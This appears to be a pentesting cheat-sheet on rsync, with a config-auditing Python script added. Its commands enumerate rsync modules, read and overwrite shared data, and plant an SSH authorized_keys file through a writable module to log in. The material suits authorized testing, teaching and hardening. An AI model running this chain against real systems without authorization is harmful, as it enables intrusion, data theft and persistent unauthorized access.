# Rsync Pentesting

Rsync is a utility for efficiently transferring and synchronizing files between a computer and a storage drive, and across networked computers, by comparing the modification times and sizes of files. The default port is 873.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```shellscript
nmap --script rsync-list-modules -p 873 <target-ip>
nmap --script rsync-brute --script-args 'rsync-brute.module=www' <target-ip>

# Banner grabbing and listing shared folders
# After replying with '@RSYNCD: <version>', we can send '#list' or the name of a module we found.
nc -nv <target-ip> 873
@RSYNCD: 31.0
#list
raidroot
Conf
@RSYNCD: EXIT

# List sync data using rsync
rsync <target-ip>::
rsync -av --list-only rsync://<target-ip>

# List sync data using Metasploit
msf> use auxiliary/scanner/rsync/modules_list
```

Once we have found a shared folder, check whether we can connect to it without authentication.\
Assume that we found the “shares” folder.

```shellscript
# Netcat
nc -nv <target-ip> 873
@RSYNCD: 31.0
shares
@RSYNCD: OK

# Rsync
rsync <target-ip>::shares
rsync -av --list-only rsync://<target-ip>:873/shares
```

#### Check Config File <a href="#check-config-file" id="check-config-file"></a>

```shellscript
find / -name "rsyncd.conf" 2>/dev/null
cat /path/to/rsyncd.conf
```
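
Whether the anonymous listing, the write-back sync and the authorized\_keys step on this page succeed depends on how each module is configured in `rsyncd.conf`. The following Python script is an added example (not part of the original page or of rsync itself) that parses such a file and flags modules with no `auth users`, `read only = no`, no `hosts allow`, or a writable path under a home directory. The sample config and the finding names are constructed for illustration, and the parser assumes a plain file with global parameters before the first module (no include directives or line continuations).

```python
import re
# Constructed sample rsyncd.conf for this example (not from a real host).
SAMPLE_CONF = """\
# global parameters act as defaults for every module
read only = no
[backup]
path = /srv/backup
auth users = backupsvc
hosts allow = 10.0.0.0/8
[share]
path = /home/dev
[docs]
path = /srv/docs
Read Only = yes
"""

def parse_rsyncd_conf(text):
    """Return {module: params}; global parameters are inherited as defaults."""
    defaults, modules, current = {}, {}, None
    for line in map(str.strip, text.splitlines()):
        if not line or line[0] in "#;":
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = modules.setdefault(header.group(1).strip(), dict(defaults))
        elif "=" in line:
            key, value = line.split("=", 1)
            key = re.sub(r"\s+", "", key).lower()  # "Read Only" -> "readonly"
            (defaults if current is None else current)[key] = value.strip()
    return modules

def audit(text):
    """Return {module: [findings]} for settings that permit unauthenticated use."""
    report = {}
    for name, p in parse_rsyncd_conf(text).items():
        anonymous = not p.get("authusers")  # no "auth users" means no password
        writable = p.get("readonly", "yes").lower() in ("no", "false", "0")
        findings = ["anonymous-write" if writable else "anonymous-read"] if anonymous else []
        if not p.get("hostsallow"):
            findings.append("no-host-restriction")
        # A writable module rooted in a home directory exposes ~/.ssh/authorized_keys.
        if writable and re.match(r"/(home|root)(/|$)", p.get("path", "")):
            findings.append("writable-home-path")
        report[name] = findings
    return report

if __name__ == "__main__":
    for module, findings in audit(SAMPLE_CONF).items():
        print(f"{module}: {', '.join(findings) or 'ok'}")
```

To audit a real file, pass its contents to `audit()` in place of `SAMPLE_CONF`.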

### Sync Data <a href="#sync-data" id="sync-data"></a>

After gathering the modules (shared folders), we can sync them with a local folder.

#### From Remote to Local <a href="#from-remote-to-local" id="from-remote-to-local"></a>

We can sync a remote folder with a local folder.

```shellscript
# -a: Archive
# -v: Verbose
rsync -av <remote-ip>::<src_dir> <dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
mkdir test_shared
rsync -av <remote-ip>::share test_shared
rsync -av rsync://<remote-ip>:873/share test_shared
```

To update the synced data, modify the files in the local copy of the shared folder, then rsync them back as described in “From Local to Remote”.

#### From Local to Remote <a href="#from-local-to-remote" id="from-local-to-remote"></a>

We can sync our local folder with a remote folder.

```shellscript
# -a: Archive
# -v: Verbose
rsync -av <src_dir> <remote-ip>::<dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
rsync -av test_shared <remote-ip>::share
rsync -av test_shared rsync://<remote-ip>:873/share
```

### SSH Key Syncing and SSH Login <a href="#ssh-key-syncing-and-ssh-login" id="ssh-key-syncing-and-ssh-login"></a>

#### 1. Generate an SSH key on the local machine <a href="#id-1-generate-a-ssh-key-in-local-machine" id="id-1-generate-a-ssh-key-in-local-machine"></a>

Generate a key pair, then copy the content of the public key into a local authorized\_keys file.

```shellscript
ssh-keygen -f testkey
cat testkey.pub > authorized_keys
```

#### 2. Sync the authorized\_keys with the remote .ssh directory <a href="#id-2-sync-the-authorized_keys-with-the-remote-ssh-directory" id="id-2-sync-the-authorized_keys-with-the-remote-ssh-directory"></a>

```shellscript
rsync authorized_keys rsync://<remote-user>@<remote-ip>:873/<home_user>/.ssh
```

#### 3. SSH login with the generated private key <a href="#id-3-ssh-login-with-the-generated-private-key" id="id-3-ssh-login-with-the-generated-private-key"></a>

```shellscript
ssh <remote-home-user>@<remote-ip> -i testkey
```

